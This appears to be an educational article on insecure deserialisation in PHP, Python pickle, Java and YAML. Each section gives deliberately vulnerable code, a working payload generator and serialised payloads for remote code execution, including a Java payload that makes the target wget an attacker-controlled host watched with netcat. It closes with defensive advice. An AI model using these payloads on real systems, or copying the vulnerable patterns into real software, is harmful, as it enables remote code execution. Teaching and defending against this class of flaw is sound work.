Insecure Deserialisation

Deserialisation of untrusted data is ranked 8th in the 2017 OWASP Top Ten list of the most critical security risks to web applications. This vulnerability is identified as CWE-502, and occurs when the application deserialises data from an untrusted source without proper validation. Deserialisation mechanisms are often exploited by attackers to gain remote code execution in the compromised system.

In this article, we will analyse the most common cases of insecure deserialisation and examples of its exploitation. We will also give recommendations on how to address such threats.

Introduction

What does deserialisation mean?

Serialisation is the process of representing structures and objects specific to a certain programming language in a single format, usually as a specific string format or a byte sequence.

Deserialisation is a reverse process, which involves the restoring of structures and objects from a serialised string or a byte sequence.

Serialisation and deserialisation are often used to save the program’s current state, for instance, on a hard drive or in a database, and to exchange data between various applications. Modern programming languages provide convenient mechanisms to serialise and deserialise their structures. They are favoured by developers for being easy and quick tools, which do not require any additional libraries and save users the trouble of handling incompatible serialised data.

Meanwhile, serialisation and deserialisation mechanisms offer a greater variety of capabilities, rather than just representing objects in a single format. Unfortunately, many developers do not give due consideration to these mechanisms, which results in programming errors and, consequently, in serious application security problems.

Deserialisation in PHP

PHP implements serialisation and deserialisation through the in-built serialise() and unserialise() functions, respectively.

The serialise() function takes an object as a parameter and returns its serialised representation as a string.

The unserialise() function takes a string that contains a serialised object as a parameter and returns a deserialised object restored from this string.

Let us consider a simple example.

<?php 
    class Injection{
        public $some_data;
        function __wakeup(){
            if(isset($this->some_data)){
                eval($this->some_data);
            }
        }
    }

    if(isset($_REQUEST['data'])){
        $result = unserialize($_REQUEST['data'])
        
        // do something with $result object
        // ...
    }
?>

In this example, the Injection class is implementing the __wakeup() magic method. This method will be implemented once the Injection class object is deserialised, and, as illustrated, it will execute the code stored in the $some_data class variable.

Using the code below, we will generate the payload to exploit this type of structure.

<?php
    class Injection{
        public $some_data;
        function __wakeup(){
            if(isset($this->some_data)){
                eval($this->some_data);
            }
        }
    }
    
    $inj = new Injection();
    $inj->some_data = "phpinfo();";
    echo(serialize($inj));
?>

As a result of code execution, we get a serialised object as follows:

 O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}

Now let us inject this serialised object into our vulnerable application as data within the data parameter.

 https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}

The code execution and deserialisation of the injected object will prompt the execution of the in-built phpinfo() function. This gives an attacker the opportunity to execute the code remotely in the vulnerable system.

It should be however noted that exploitation of insecure deserialisation in PHP does not always lead to remote code execution. It may result in the reading or writing of random files, SQL injections, denial of service, etc.

For a successful attack, the target application must have classes, which implement the respective magic methods. Generally, the most useful methods for this purpose are __destruct(), __wakeup() and __toString(). Furthermore, to identify a vulnerable class or a string of classes (the so-called ’gadget’), the attacker must have access to the source code.

However, applications often come with various in-built frameworks that already contain the necessary gadgets. In this case, the payload can be generated with the help of the PHPGGC utility.

Deserialisation in Python

Python and PHP have very similar serialisation and deserialisation mechanisms. In Python, these processes are implemented through the in-built pickle library.

pickle.dump() takes an object and a file name as parameters and dumps the serialised version of the object into the file with the given name.

pickle.load() takes the file name that contains a serialised object as a parameter and returns the deserialised object.

pickle.dumps() takes an object as a parameter and returns its serialised representation as a byte string.

pickle.loads() takes a byte string that contains a serialised object as a parameter and returns a deserialised object restored from this string.

Let us give a simple example.

import pickle
from flask import request

@app.route('vulnerable.py', methods=['GET'])
def parse_request():
    data = request.request.args.get('data')
    if (data):
        pickle.loads(data)
        # do something with result object
        # ...

Using the code below, we will generate the payload to exploit this type of structure.

import pickle

class Payload(object):
    def __reduce__(self):
        return (exec, ('import os;os.system("ls")', ))
        
pickle_data = pickle.dumps(Payload())

print(pickle_data)

As a result of code execution, we get a serialised object as follows:

 b'\x80\x03cbuiltins\nexec\nq\x00X\x19\x00\x00\x00import os;os.system("ls")q\x01\x85q\x02Rq\x03.'

Now let us transfer this serialised and url-encoded object to our vulnerable application as data within the data parameter :

https://example.com/vulnerable.py?data=%80%03cbuiltins%0Aexec%0Aq%00X%19%00%00%00import%20os%3Bos.system%28%22ls%22%29q%01%85q%02Rq%03.

The code execution and deserialisation of the transferred object will prompt the os.system() function with an ls parameter to be called. This will produce a list of files in the current working directory of the application, giving the intruder possibility to execute the code in the vulnerable system remotely.

In the case of Python, no additional conditions are required for a successful attack. Therefore, to be on the safe side, you better avoid using pickle.loads() when deserialisaing untrusted data.

Deserialisation in Java

Deserialisation in Java is similar to the PHP and Python processes.

Usually, the following structures are employed:

readObject() method of the java.beans.XMLDecoder class
fromXML() method of the com.thoughtworks.xstream.XStream class
readObject(), readObjectNodData(), readResolve(), readExternal(), readUnshared() methods of the java.io.ObjectInputStream class

Let us illustrate the use of the readObject() method of the java.io.ObjectInputStream class drawing on a simple example:

import java.util.*;
import java.io.*;

class Injection implements Serializable
{
  public String some_data;

  private void readObject(ObjectInputStream in)
  {
    try
    {
      in.defaultReadObject();
      Runtime.getRuntime().exec(some_data);
    }
    
    catch (Exception e)
    {
      System.out.println("Exception: " + e.toString());
    }
  }
}

public class Main
{
  public static void main(String[] args)
  {
    Object obj = new Object ();

    try
    {
      String inputStr = args[1];
      byte[] decoded = Base64.getDecoder().decode(inputStr.getBytes("UTF-8"));
      ByteArrayInputStream bis = new ByteArrayInputStream(decoded);
      ObjectInput in = new ObjectInputStream(bis);
      obj = in.readObject();
      
      // do something with result object
      // ...
    }
    
    catch (Exception e)
    {
      System.out.println("Exception: " + e.toString ());
    }
  }
}

Using the code below, we will generate the payload to exploit this type of structure.

import java.util.*;
import java.io.*;

class Injection implements Serializable
{
  public String some_data;
}

public class Main
{
  public static void main(String[] args)
  {
try
    {
      Injection inj = new Injection();
      inj.some_data = "wget http://example.com:8080";

      ByteArrayOutputStream baos = new ByteArrayOutputStream();
      ObjectOutputStream oos = new ObjectOutputStream(baos);
      oos.writeObject(inj);
      oos.close();
      
      System.out.println(new String(baos.toByteArray()));
      System.out.println(Base64.getEncoder().encodeToString(baos.toByteArray()));
    }
    
    catch (Exception e)
    {
      System.out.println ("Exception: " + e.toString ());
    }
  }
}

As a result of code execution, we get a serialised object as follows:

 ��sr Injection��+r7�L some_datatLjava/lang/String;xptwget http://example.com:8080

And, for the convenient interaction with binary data, the same object represented in the base64-encoded format:

 rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==

Let us transfer this serialised and base64-encoded object to our vulnerable application as an input parameter.

 java -jar vulerable.jar rO0ABXNyAAlJbmplY3Rpb26voStyN+CgGAIAAUwACXNvbWVfZGF0YXQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAcd2dldCBodHRwOi8vZXhhbXBsZS5jb206ODA4MA==

The code execution and deserialisation of the transferred object prompts the Runtime.getRuntime().exec() function with the wget http://example.com:8080 parameter to be called, which is further confirmed on the controlled server example.com:

root@example.com:~$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [***.***.***.***] from (UNKNOWN) [***.***.***.***] 45430
GET / HTTP/1.1
User-Agent: Wget/1.15 (linux-gnu)
Accept: */*
Host: example.com:8080
Connection: Keep-Alive

This is how the attacker is able to perform remote code execution in the vulnerable system.

Same as in PHP, to enable remote code execution in Java, the application must have the required class that would implement the Serialisable interface. In our example, this is the Injection class. Again, it is almost impossible to find the suitable gadget without having access to the source code. Where the application uses certain in-built frameworks and class libraries, the payload can be generated with the help of the ysoserial utility.

YAML Deserialisation

There is a variety of languages and frameworks that enable remote code execution during the course of YAML deserialisation.

For example, execution of a similar code in Python will result in the output of the current directory listing:

import yaml

yaml.load("!!python/object/new:os.system [ls -la]", Loader=yaml.UnsafeLoader)

This is quite a widespread problem. However, this article does not provide specific examples, since the YAML file processing functionality is implemented differently in various languages.

As you can see from the code snippet above, the Loader=yaml.UnsafeLoader argument was passed explicitly when calling the yaml.load()function. This is important: the latest versions of the library do not allow using vulnerable methods by default.

Thus, an attempt to call yaml.load() without additional parameters, will result in an error message:

main.py:3: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.

However, in the earlier versions, the yaml.load()function did not limit the execution of control structures. Therefore, the yaml.safe_load() function had to be used for secure deserialisation of untrusted YAML. Nonetheless, you can still come across this vulnerability in many applications that use earlier library versions to work with YAML.

Given the above, we recommend using trusted structures such as yaml.safe_load(), rather than relying on the foresight of the library vendor.

Conclusion

Serialisation and deserialisation are indeed powerful and flexible tools. They provide developers with a convenient way to manipulate, transmit and save data on hard drives or in databases. However, like any other tool, it should be used correctly with security precautions in mind.

Let’s face it, there is no simple and universal method to protect an application from deserialisation attacks (except maybe not using this mechanism). You are therefore encouraged to follow our recommendations for the safe use of deserialisation:

Apply secure deserialisation methods where possible, e.g. yaml.safe_load() instead of yaml.load().
Use simpler formats, e.g. JSON, to transmit and save data on the hard drive or in the database. While generally having less functionality, they do not carry such serious threats as embedded serialisation mechanisms.
Keep a whitelist of allowed classes. The developer may redefine the standard deserialisation functionality, and check whether the object being uploaded is allowed to be deserialised and whether the structures used in the serialised object are secure.
Sign transmitted serialised data. This is a good option for network data exchange between applications. Without knowing the secret key, which is used to sign the transmitted data, the attacker will not be able to make any modifications. However, it should be noted that the application or the secret key may be compromised in a different way, which may have an adverse impact on the security of related applications.
Use third-party libraries and frameworks specifically designed to improve the security of deserialisation processes (e.g. SerialKiller or NotSoSerial for Java).

It is not always easy to adhere to these recommendations, especially where the developer is required to support the existing code. However, given that deserialisation attacks may lead to remote code execution and overall system compromise, such extra efforts and time are fully justified and worth it.